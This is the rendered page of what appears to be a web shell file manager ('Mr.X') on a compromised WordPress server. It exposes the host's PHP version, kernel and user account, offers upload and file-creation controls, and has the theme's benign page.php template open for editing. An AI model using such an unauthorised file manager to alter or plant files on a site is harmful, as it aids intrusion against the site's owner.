🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:page.php
<?php get_header(); ?> <section class="page-banner-section"> <div class="container"> <div class="row"> <div class="col-12 text-center"> <h1 class="page-banner-title"><?php the_title(); ?></h1> <?php unfia_breadcrumbs(); ?> </div> </div> </div> </section> <section class="page-content-section section-padding"> <div class="container"> <div class="row g-4"> <div class="col-lg-8"> <?php while (have_posts()): the_post(); ?> <article id="post-<?php the_ID(); ?>" <?php post_class('page-content'); ?>> <?php if (has_post_thumbnail()): ?> <div class="page-thumbnail mb-4"> <?php the_post_thumbnail('unfia-hero', ['class' => 'img-fluid rounded-4']); ?> </div> <?php endif; ?> <div class="entry-content"> <?php the_content(); ?> </div> <?php wp_link_pages([ 'before' => '<div class="page-links">' . esc_html__('Pages:', 'unfia'), 'after' => '</div>', ]); ?> </article> <?php endwhile; ?> </div> <div class="col-lg-4"> <?php get_sidebar(); ?> </div> </div> </div> </section> <?php get_footer(); ?>
Save Changes
Cancel
Create New File
Create New Folder